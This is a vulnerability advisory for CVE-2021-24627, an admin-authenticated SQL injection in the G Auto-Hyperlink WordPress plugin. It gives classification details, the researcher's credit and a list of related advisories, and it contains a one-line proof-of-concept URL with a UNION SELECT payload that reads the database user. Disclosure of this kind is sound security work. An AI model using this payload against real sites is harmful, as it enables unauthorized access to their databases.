WordPress Plugin Vulnerabilities

G Auto-Hyperlink <= 1.0.1 - Admin+ SQL Injection

Description

The plugin does not sanitise or escape an 'id' GET parameter before using it in a SQL statement, to select data to be displayed in the admin dashboard, leading to an authenticated SQL injection

Proof of Concept

https://plugins.trac.wordpress.org/browser/g-auto-hyperlink/trunk/g-auto-hyperlink.php#L271

Open the follow URL as admin, which will output the current DB user: https://exxample.com/wp-admin/admin.php?page=g-auto-hyperlink-edit&id=-2198+UNION+ALL+SELECT+NULL%2Ccurrent_user%28%29%2Ccurrent_user%28%29%2Ccurrent_user%28%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--

Affects Plugins

Plugin icon
g-auto-hyperlink
No known fix

References

CVE
CVE-2021-24627
URL
https://codevigilant.com/disclosure/2021/wp-plugin-g-auto-hyperlink/

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
Shreya Pohekar of Codevigilant Project
Verified
Yes
WPVDB ID
c04ea768-150f-41b8-b08c-78d1ae006bbb

Timeline

Publicly Published
2021-10-07 (about 2 years ago)
Added
2021-10-07 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)

Other

Published
Title
Published
2023-07-12
Title
User Activity Log < 1.6.3 - Admin+ SQLi
Published
2023-10-30
Title
wp image slideshow < 12.1 - Authenticated (Subscriber+) SQL Injection via Shortcode
Published
2015-11-28
Title
Double Opt-In for Download <= 2.0.8 - SQL Injection
Published
2022-02-18
Title
Zero Spam < 5.2.11 - Admin+ SQL Injection
Published
2020-05-26
Title
Form Maker by 10Web < 1.13.36 - Authenticated SQL Injection